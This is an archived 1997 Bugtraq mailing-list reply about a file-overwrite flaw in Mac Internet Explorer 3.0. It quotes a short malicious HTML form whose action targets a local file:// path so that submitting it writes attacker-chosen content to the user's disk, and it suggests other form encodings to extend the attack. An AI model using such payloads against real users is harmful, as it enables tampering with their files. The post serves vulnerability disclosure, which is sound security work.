[5246] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

Re: Mac MSIE 3.0 file overwrite.

daemon@ATHENA.MIT.EDU (hurtta+zz@OZONE.FMI.FI)
Tue Sep 2 16:08:14 1997

Date: 	Tue, 2 Sep 1997 20:47:12 +0300
Reply-To: hurtta+zz@ozone.FMI.FI
From: hurtta+zz@OZONE.FMI.FI
X-To:         andrew@SQUIZ.CO.NZ
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To:  <v02120d00b0208d81651a@[210.48.33.120]> from Andrew McNaughton at
              "Aug 29, 97 10:54:43 am"

Andrew McNaughton:
> A Maliciously written Form might include the following:
>
> <FORM ACTION="file:///Hard_Disk/Desktop%20Folder/Untitled.html" METHOD="POST">
> <INPUT NAME="This could have overwritten anything!" TYPE=Hidden>
> <Input Type=Submit>
> </FORM>
>
> The file Hard_Disk:Desktop Folder:Untitled.html gets written or
> overwritten, and recieves the following contents:
>
> This+could+have+overwritten+anything%21=

If it supports ENCTYPE on FORM then perhaps also other encodings
may be used. ENCTYPE="multipart/form-data" and ENCTYPE="text/plain"
are good candinates.

/ Kari Hurtta


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[5246] in bugtraq

Re: Mac MSIE 3.0 file overwrite.

daemon@ATHENA.MIT.EDU (hurtta+zz@OZONE.FMI.FI)Tue Sep 2 16:08:14 1997

daemon@ATHENA.MIT.EDU (hurtta+zz@OZONE.FMI.FI)
Tue Sep 2 16:08:14 1997